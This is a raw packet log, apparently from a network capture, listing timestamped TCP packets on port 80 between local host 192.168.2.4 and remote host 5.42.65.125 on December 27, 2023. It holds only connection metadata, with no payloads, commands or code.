Dec 27, 2023 18:12:24.951941013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951944113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.951952934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951963902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951975107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951986074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.951987982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.952017069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.952706099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952723980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952740908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.952827930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952841043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952851057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952862978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952868938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.952874899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952887058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.952897072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.952913046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.953566074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953577042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953588009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953607082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.953634977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.953639030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953650951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953680992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.953706026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953747988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953758955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.953800917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.954405069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954416990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954427004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954438925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954443932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.954468012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954468966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.954507113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.954536915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954550028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954560041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.954579115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.955349922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955363035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955384970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.955526114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955538034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955549002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955559969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955560923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.955571890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955583096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955590010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.955594063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955605984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.955615044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.955630064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.956352949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956383944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956397057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956425905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.956448078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.956459999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956475973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956486940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956497908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956509113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.956510067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.956542015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.957297087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957309961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957320929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957344055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.957360029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.957412004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957423925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957462072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957465887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.957474947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957487106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.957513094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.958112955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958126068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958149910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.958173990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958187103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958206892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.958241940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958255053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958266973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958277941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.958280087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.958303928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.958956957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959091902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959105015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959115982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959126949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959129095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.959139109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959151030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959156036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.959162951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.959172964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.959192038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.960037947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960050106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960059881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960072041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960082054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.960083961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960097075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960108042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960108995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.960119963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960128069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.960151911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.960690975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960702896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960727930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.960979939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.960992098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961003065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961014032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961025000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961029053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.961036921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961047888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961055040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.961060047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961087942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.961800098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961848021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961859941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961872101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961882114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.961884975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961896896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961908102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961910009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.961920023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.961932898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.961957932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.962667942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962706089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.962722063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962832928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962845087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962881088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.962925911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962939024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962949991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962960005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.962961912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.962989092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.964014053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.964049101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.964210987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.964476109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.964488029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.964499950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.964519978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.964545965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.964761972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.964929104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.965080023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.965118885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969325066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969336987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969347954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969360113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969372034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969378948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969383955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969392061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969420910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969455004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969466925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969477892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969489098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969491005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969501019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969511986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969516993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969523907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969536066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969542980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969547987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969558954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969564915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969571114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969592094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969594002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969609976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969779968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969791889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969803095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969813108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969825029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969827890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969837904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969849110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969855070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969861031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.969871998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.969882965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.970634937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970670938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.970763922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970777035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970793962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970808029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.970905066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970917940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970930099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970941067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.970949888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.970978975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.971594095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971606970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971627951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.971776962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971790075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971801043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971812963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.971812963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971824884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971837044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.971839905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.971863985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.972605944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972619057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972644091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.972752094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972764969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972774982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972784996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.972811937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.972877026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972891092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972903013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.972924948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.973654985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973666906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973679066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973690033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973695040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.973702908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973715067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973718882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.973726988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973737955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.973751068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.973777056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.974633932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974646091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974678040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.974828005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974839926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974850893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974862099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974863052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.974874020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974885941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.974891901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.974917889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.975368977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975382090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975414038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.975776911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975789070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975800991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975811005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.975811958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975824118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975841999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.975867987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.975893974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975905895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975917101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.975944996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.979948997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.979960918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.979973078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.979984045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.979995012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.979998112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980125904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980139017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980149031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980150938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980164051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980187893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980216026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980225086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980237007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980247974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980258942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980267048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980269909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980293989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980351925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980364084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980390072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980554104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980566025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980572939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980583906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980587006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980616093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980731964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980895996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980907917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980920076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980930090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980937958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980942011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980954885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.980968952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.980986118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.981036901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981050968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981062889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981072903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981085062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981086969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.981123924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.981466055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981482029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981496096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981502056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.981508017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981519938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981530905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.981561899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.981581926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981595039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.981631994 CET	49738	80	192.168.2.4	5.42.65.125
